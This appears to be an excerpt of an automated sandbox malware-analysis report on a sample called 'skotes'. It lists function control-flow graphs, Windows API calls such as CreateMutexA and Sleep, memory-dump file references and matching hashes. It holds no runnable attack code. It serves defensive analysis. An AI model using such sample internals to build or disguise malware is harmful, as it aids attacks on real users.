                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __dosmaperr$File$CreateType
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 3443242726-2852464175
                                                                                                                                              • Opcode ID: ebdf73e1a1382703fb9d80047de4564698e7f95763cdb7ee6f48313eba281093
                                                                                                                                              • Instruction ID: f555276e453fe840cb4f526367cb36602bd9df184fa0eefa914a177282c6a8e2
                                                                                                                                              • Opcode Fuzzy Hash: ebdf73e1a1382703fb9d80047de4564698e7f95763cdb7ee6f48313eba281093
                                                                                                                                              • Instruction Fuzzy Hash: 7CA14972A041489FDF19DF68DC91BAE3BA1AB0A324F15015EE811AB3E1D7389D42C75A
                                                                                                                                              Function 00436FB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1725 436fb4-436fe9 GetFileType 1726 4370a1-4370a4 1725->1726 1727 436fef-436ffa 1725->1727 1730 4370a6-4370a9 1726->1730 1731 4370cd-4370f5 1726->1731 1728 43701c-437038 call 4340f0 GetFileInformationByHandle 1727->1728 1729 436ffc-43700d call 43732a 1727->1729 1741 4370be-4370cb call 4375c0 1728->1741 1746 43703e-437080 call 43727c call 437124 * 3 1728->1746 1743 437013-43701a 1729->1743 1744 4370ba-4370bc 1729->1744 1730->1731 1736 4370ab-4370ad 1730->1736 1732 437112-437114 1731->1732 1733 4370f7-43710a 1731->1733 1738 437115-437123 call 41cff1 1732->1738 1733->1732 1749 43710c-43710f 1733->1749 1740 4370af-4370b4 call 4375f6 1736->1740 1736->1741 1740->1744 1741->1744 1743->1728 1744->1738 1761 437085-43709d call 437249 1746->1761 1749->1732 1761->1732 1764 43709f 1761->1764 1764->1744
                                                                                                                                              APIs
                                                                                                                                              • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436EE6), ref: 00436FD6
                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 00437030
                                                                                                                                              • __dosmaperr.LIBCMT ref: 004370C5
                                                                                                                                                • Part of subcall function 0043732A: __dosmaperr.LIBCMT ref: 0043735F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                              • String ID: nC
                                                                                                                                              • API String ID: 2531987475-4036674207
                                                                                                                                              • Opcode ID: 4f35835494ed1b616429f2cbe61339839b0a90c39491ae3327cbf250b61df6b1
                                                                                                                                              • Instruction ID: 3c962bd61754ed57fc80dac4ea44a5d67823964de56beca9c8e51ad0edd48422
                                                                                                                                              • Opcode Fuzzy Hash: 4f35835494ed1b616429f2cbe61339839b0a90c39491ae3327cbf250b61df6b1
                                                                                                                                              • Instruction Fuzzy Hash: F24140B2904204ABDF389F76DC419ABBBF9EF49304F10541EF996D3611E6349940DB25
                                                                                                                                              Function 00409BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1765 409ba5-409bc5 GetFileAttributesA 1768 409bf3-409c0f 1765->1768 1769 409bc7-409bd3 1765->1769 1772 409c11-409c1d 1768->1772 1773 409c3d-409c5c 1768->1773 1770 409bd5-409be3 1769->1770 1771 409be9-409bf0 call 41d663 1769->1771 1770->1771 1774 40a91c 1770->1774 1771->1768 1776 409c33-409c3a call 41d663 1772->1776 1777 409c1f-409c2d 1772->1777 1778 409c8a-40a916 call 4180c0 1773->1778 1779 409c5e-409c6a 1773->1779 1781 40a953-40a987 Sleep CreateMutexA 1774->1781 1782 40a91c call 436c6a 1774->1782 1776->1773 1777->1774 1777->1776 1785 409c80-409c87 call 41d663 1779->1785 1786 409c6c-409c7a 1779->1786 1794 40a98e-40a994 1781->1794 1782->1781 1785->1778 1786->1774 1786->1785 1795 40a996-40a998 1794->1795 1796 40a9a7-40a9a8 1794->1796 1795->1796 1797 40a99a-40a9a5 1795->1797 1797->1796 1799 40a9a9-40a9b0 call 436629 1797->1799
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00409BA8
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 7443bcfcd3464c4d27045057fe77a8d1a6ac5a589fb9b08eb10097b3909b16ba
                                                                                                                                              • Instruction ID: 3ef3e4e33d59fa22e7d6d505b75130d5e6ce5164d26c49e161d1452d1a8baf31
                                                                                                                                              • Opcode Fuzzy Hash: 7443bcfcd3464c4d27045057fe77a8d1a6ac5a589fb9b08eb10097b3909b16ba
                                                                                                                                              • Instruction Fuzzy Hash: 9C312C71B042009BFB08DB68DD8975DB7B2ABC6314F24862AE014B73D6C77D5E80875A
                                                                                                                                              Function 00409CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1802 409cda-409cfa GetFileAttributesA 1805 409d28-409d44 1802->1805 1806 409cfc-409d08 1802->1806 1809 409d72-409d91 1805->1809 1810 409d46-409d52 1805->1810 1807 409d0a-409d18 1806->1807 1808 409d1e-409d25 call 41d663 1806->1808 1807->1808 1811 40a921 1807->1811 1808->1805 1815 409d93-409d9f 1809->1815 1816 409dbf-40a916 call 4180c0 1809->1816 1813 409d54-409d62 1810->1813 1814 409d68-409d6f call 41d663 1810->1814 1818 40a953-40a987 Sleep CreateMutexA 1811->1818 1819 40a921 call 436c6a 1811->1819 1813->1811 1813->1814 1814->1809 1822 409da1-409daf 1815->1822 1823 409db5-409dbc call 41d663 1815->1823 1831 40a98e-40a994 1818->1831 1819->1818 1822->1811 1822->1823 1823->1816 1832 40a996-40a998 1831->1832 1833 40a9a7-40a9a8 1831->1833 1832->1833 1834 40a99a-40a9a5 1832->1834 1834->1833 1836 40a9a9-40a9b0 call 436629 1834->1836
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00409CDD
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: a56b2bddcae878a69032a41053501eaffb11e0449938a8bc4cd5d9e09db70089
                                                                                                                                              • Instruction ID: ba2e40fcba1768e6d3169c730849953719c42aa131929d2da9312b918ec8e80b
                                                                                                                                              • Opcode Fuzzy Hash: a56b2bddcae878a69032a41053501eaffb11e0449938a8bc4cd5d9e09db70089
                                                                                                                                              • Instruction Fuzzy Hash: BA3148717042409BEB08DB78DD8879DB762EF86314F24862AE014B73D6C73D5E90871A
                                                                                                                                              Function 00409F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1839 409f44-409f64 GetFileAttributesA 1842 409f92-409fae 1839->1842 1843 409f66-409f72 1839->1843 1846 409fb0-409fbc 1842->1846 1847 409fdc-409ffb 1842->1847 1844 409f74-409f82 1843->1844 1845 409f88-409f8f call 41d663 1843->1845 1844->1845 1850 40a92b 1844->1850 1845->1842 1852 409fd2-409fd9 call 41d663 1846->1852 1853 409fbe-409fcc 1846->1853 1848 40a029-40a916 call 4180c0 1847->1848 1849 409ffd-40a009 1847->1849 1854 40a00b-40a019 1849->1854 1855 40a01f-40a026 call 41d663 1849->1855 1857 40a953-40a987 Sleep CreateMutexA 1850->1857 1858 40a92b call 436c6a 1850->1858 1852->1847 1853->1850 1853->1852 1854->1850 1854->1855 1855->1848 1868 40a98e-40a994 1857->1868 1858->1857 1869 40a996-40a998 1868->1869 1870 40a9a7-40a9a8 1868->1870 1869->1870 1871 40a99a-40a9a5 1869->1871 1871->1870 1873 40a9a9-40a9b0 call 436629 1871->1873
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00409F47
